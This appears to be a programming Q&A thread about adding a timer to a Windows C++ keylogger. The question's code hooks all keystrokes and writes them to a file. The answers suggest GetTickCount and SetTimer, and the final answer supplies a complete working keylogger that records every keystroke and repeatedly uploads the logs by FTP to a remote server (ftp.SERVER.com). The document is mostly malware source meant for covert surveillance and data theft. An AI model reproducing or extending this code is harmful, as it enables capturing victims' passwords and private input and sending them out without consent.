# How do I add a timer to a keylogger c++

Tags: c++, timer, sleep, keystroke, keylogger

What can I do to make a timer in this keylogger so it sends logs every hour? I tried `Sleep()` function while loops, but they don't seem to work. I thought of using multi-threading, but I thought there must be a more efficient method.

```
    #define _WIN32_WINNT 0x0500

    #include<fstream>
    #include<windows.h>
    #include<iostream>
    //globals   
    using namespace std;

    ofstream out("keys.txt", ios::out);

    LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam) {
        PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT) (lParam);

        // If key is being pressed
        if (wParam == WM_KEYDOWN) {
            switch (p->vkCode) {

                // Invisible keys
                case VK_LCONTROL:   out << "<LCTRL>";       break;
                case VK_RCONTROL:   out << "<RCTRL>";       break;
                case VK_INSERT:     out << "<INSERT>";      break;
                case VK_END:        out << "<END>";         break;
                case VK_PRINT:      out << "<PRINT>";       break;
                case VK_DELETE:     out << "<DEL>";         break;
                case VK_BACK:       out << "<BK>";          break;

                case VK_LEFT:       out << "<LEFT>";        break;
                case VK_RIGHT:      out << "<RIGHT>";       break;
                case VK_UP:         out << "<UP>";          break;
                case VK_DOWN:       out << "<dDOWN>";       break;

                case VK_RETURN:     out << "<ENTER>\n";     break;

                //add special keys like semicolons

                // Visible keys
                default:
                    if (GetKeyState(VK_CAPITAL) && GetAsyncKeyState(VK_SHIFT))  //this should be on top to detect simultanous input first
                    out << char(tolower(p->vkCode));

                    else if (GetKeyState(VK_CAPITAL)||GetAsyncKeyState(VK_SHIFT))
                    out << char(toupper(p->vkCode));
                    //add capital version of sepecial keys

                    else 
                    out << char(tolower(p->vkCode));
            }
            out.flush();    //to immediately flush to txt file
            cout<<p<<endl;
        }


        return CallNextHookEx(NULL, nCode, wParam, lParam);
        }




    int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) {

        // Set windows hook

        HHOOK keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL,keyboardHookProc,hInstance,0);

        MessageBox(NULL, "Press OK to stop logging.", "Information", MB_OK);

        out.close();

        return 0;
    }
```

I'm using DEVC++

Comment: Depends on if you want them every hour on the hour (harder), or just if more than an hour has elapsed (easier)!

Answer (score 1):

If you just want to send your logs every once in a while, you can easily do a check to detect how long it has been since the last log update!

**Easy Method**

You'll need to store all your keylogs between file updates. You can easily put them into a [vector](http://www.cplusplus.com/reference/vector/vector/).

So Instead of outputting to your file with `out << blahblah` add the character to your vector with `vectorname.push_back(blahblah)`

You'll also need a timing variable. You can use the windows.h function [GetTickCount](http://msdn.microsoft.com/en-us/library/windows/desktop/ms724408%28v=vs.85%29.aspx) for all of your timing needs.

When your keyboard hook/callback (the method you have your actual keylogging code in) gets called, check to see if it's been an hour since the last time you updated your log file, if it has been an hour or longer, update it and set your timing variable = GetTickCount.

Hope that helps!

Comment: Good general approach +1.  A `std::ostringstream` is a smaller/easier change than a `std::vector`, and `time(0)` is Standard/portable and in seconds.

Comment: You're definitely right! I wasn't thinking about portability because he was using Windows call backs, but that's no excuse. I suppose you're right on the ostringstream, that would make editing his code quite a bit easier as well!

Answer (score 0):

The Win32 API function  `SetTimer`  executes a function every x milliseconds or any given time.

[http://msdn.microsoft.com/en-us/library/windows/desktop/ms644906(v=vs.85).aspx](http://msdn.microsoft.com/en-us/library/windows/desktop/ms644906%28v=vs.85%29.aspx)

The following console program works like this: It sets a timer using `SetTimer` 
then loops in a message loop. The message loop receives and processes `WM_TIMER` messages 
and the timer callback also is called for each time interval.

```
usage_Time_millisec=1000;//1 sec=1000ms  1 min=60*1000ms
```

Simply put the stuff you want done in the CALLBACK  `TimerProc()` function.

```
#define STRICT 1 
#include <windows.h>
#include <iostream.h>
#include <time.h>

unsigned long minutes=0;
int Counter=0;
int usage_Time_millisec=1000;//1 sec=1000ms  1 min=60*1000ms
clock_t timer_start, timer_stop;
MSG Msg;
   UINT TimerId; 


VOID CALLBACK TimerProc(HWND hWnd, UINT nMsg, UINT nIDEvent, DWORD dwTime) 
{

   //put the stuff you want done in here

  cout << "Doing stuff Time: " << dwTime << '\n';


  cout << abs(timer_start - timer_stop )  <<"   millisecond delay " << endl;
  cout << "--------------------------------------------------\n" ;
  cout.flush();

}

int main(int argc, char *argv[], char *envp[]) 
{

        usage_Time_millisec=1000;//1 sec=1000ms  1 min=60*1000ms
        TimerId  = SetTimer(NULL, 0, usage_Time_millisec, &TimerProc); //bind TimerProc() to SetTimer() 

        timer_start = clock ();
        timer_stop = clock ();

        cout << "TimerId: " << TimerId << '\n';

        if (!TimerId) return 16;

        while (GetMessage(&Msg, NULL, 0, 0)) 
        {

            ++Counter;
            if (Msg.message == WM_TIMER)
            {

                timer_start = clock ();
                //cout << "Doing stuff Counter: " << Counter << "; timer message\n";
            }
            else
            {
                timer_stop = clock ();
                timer_start = clock ();
                //cout << "Doing stuff Counter: " << Counter << "; message: " << Msg.message << '\n';
            }
            DispatchMessage(&Msg);
        }

        KillTimer(NULL, TimerId);

return 0;

}
```

Answer (score 0):

I used `SetTimer()` and it works like a charm.

```
#define _WIN32_WINNT 0x0500
#include<fstream>
#include<windows.h>

#include<iostream>
#include <time.h>
#include <wininet.h>

using namespace std;
//globals
char date[100]; //must be a global variable
char *datetxt;   //must be a global variable
char *buffer;   //for outputting to new file, if there isnt internet
void namer();  //show nointernet() that namer() exists
void nointernet()
{
    std::ifstream    inFile(datetxt);//copy to buffer
    inFile >> buffer;
    inFile.close();
    remove(datetxt);  //delete old name
    namer();  //give new name
    std::ofstream    outFile(datetxt); //should be here to avoid new and old name mishaps
    outFile << buffer;   //enter copied data here

}
void namer()
{
    time_t rawtime;
    struct tm *timeinfo;
    time (&rawtime);
    timeinfo = localtime (&rawtime);
    strftime(date, 100, "%H%M%d%m%Y%S", timeinfo); //get date
    datetxt = strcat(date, ".txt");                 //joins date with a .txt extrention
}

int upload()
{
    HINTERNET hInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); // Initialization for WinInet Functions
    if (!hInternet)
    {
        nointernet(); //if there is no internet, append new log file
    }


    HINTERNET hFtpSession = InternetConnect(hInternet, "ftp.SERVER.com", INTERNET_DEFAULT_FTP_PORT, "USER", "PASS", INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0); // Starts a session in this case an FTP session
    if (!hFtpSession)
    {
        InternetCloseHandle(hInternet);
        nointernet();   //if you cant access ftp, append to new log file

    }

    FtpPutFile(hFtpSession, datetxt, datetxt, FTP_TRANSFER_TYPE_BINARY, 0); // Uploads datetxt file  onto the FTP server as datetxt


    InternetCloseHandle(hFtpSession); // Close hFtpSession
    InternetCloseHandle(hInternet); // Close hInternet
    //delete old datetxt
    namer();   //give new name
    return 0;
}

void CALLBACK repeat(HWND hwnd, UINT uMsg, UINT timerId, DWORD dwTime)
{
    upload();  //upload old name and change name


}



LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam)
{


    PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT) (lParam);
    ofstream out(datetxt, ios::app);
    // If key is being pressed

    if (wParam == WM_KEYDOWN)
    {
        switch (p->vkCode)
        {
        // Invisible keys
        case VK_LCONTROL:   out << "<LCTRL>";        break;
        case VK_RCONTROL:   out << "<RCTRL>";       break;
        case VK_INSERT:     out << "<INSERT>";      break;
        case VK_END:        out << "<END>";         break;
        case VK_PRINT:      out << "<PRINT>";       break;
        case VK_DELETE:     out << "<DEL>";         break;
        case VK_BACK:       out << "<BK>";          break;

        case VK_LEFT:       out << "<LEFT>";        break;
        case VK_RIGHT:      out << "<RIGHT>";       break;
        case VK_UP:         out << "<UP>";          break;
        case VK_DOWN:       out << "<dDOWN>";       break;

        case VK_RETURN:     out << "<ENTER>\n";     break;

            //add special keys like semicolons

        // Visible keys
        default:
            if (GetKeyState(VK_CAPITAL) && GetAsyncKeyState(VK_SHIFT))  //this should be on top to detect simultanous input first
                out << char(tolower(p->vkCode));

            else if (GetKeyState(VK_CAPITAL) || GetAsyncKeyState(VK_SHIFT))
                out << char(toupper(p->vkCode));
            //add capital version of special keys

            else
                out << char(tolower(p->vkCode));


        }
        out.close();    //to immediately flush to txt file
        cout << p << endl;
    }

    return CallNextHookEx(NULL, nCode, wParam, lParam);


}


int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
    namer();   // for the datetxt name

    HHOOK keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, keyboardHookProc, hInstance, 0); // Set windows hook

    //re-run program here/*************************************************
    MSG msg;

    SetTimer(NULL, 0, 10000, (TIMERPROC) &repeat);
    while (GetMessage(&msg, NULL, 0, 0))
    {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }
    //till here/**********************************************************/
    // out.close();
    BOOL WINAPI UnhookWindowsHookEx(HHOOK keyboardHook);
    return 0;

}
```